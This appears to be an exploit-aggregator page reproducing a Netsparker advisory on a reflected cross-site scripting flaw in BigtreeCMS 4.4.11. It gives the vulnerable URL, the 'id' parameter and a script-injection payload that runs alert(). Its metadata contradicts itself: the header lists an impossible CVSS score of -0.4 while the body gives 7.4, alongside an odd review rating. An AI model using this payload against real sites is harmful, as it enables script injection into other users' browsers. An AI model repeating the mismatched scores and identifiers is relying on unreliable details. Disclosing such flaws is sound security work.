Exploit BigtreeCMS 4.4.11 Cross Site Scripting CVE-2020-995566

Name: BigtreeCMS 4.4.11 Cross Site Scripting CVE-2020-995566
Rating: 5 (366 reviews)

2020-12-10 | CVSS -0.4

## https://sploitus.com/exploit?id=PACKETSTORM:160439
Information  
--------------------  
  
Advisory by Netsparker  
Name: Cross-Site Scripting Vulnerability in BigtreeCMS  
Affected Software: BigtreeCMS  
Affected Versions: 4.4.11  
Vendor Homepage: https://www.bigtreecms.org/  
Vulnerability Type: Cross-Site Scripting  
Severity: Important  
Status: Fixed  
CVE-ID: CVE-2020-995566  
CVSS Score (3.0): 7.4 (High)  
Netsparker Advisory Reference: NS-20-004  
  
Technical Details  
--------------------  
  
URL: http://mylocalhost/site/index.php/admin/js/embeddable-form.js?hash=&id=  
'"--></style></scRipt><scRipt>alert(0x00E4E5)</scRipt>  
Parameter Name: id  
Parameter Type: GET  
Attack Pattern: '"--></style></scRipt><scRipt>alert(2)</scRipt  
  
Note: This vulnerability is reproducible at Internet Explorer due to mime  
type sniffing.  
  
For more information on cross-site scripting vulnerabilities read the  
article Cross-site Scripting (XSS).  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-20-004-cross-site-scripting-in-bigtreecms/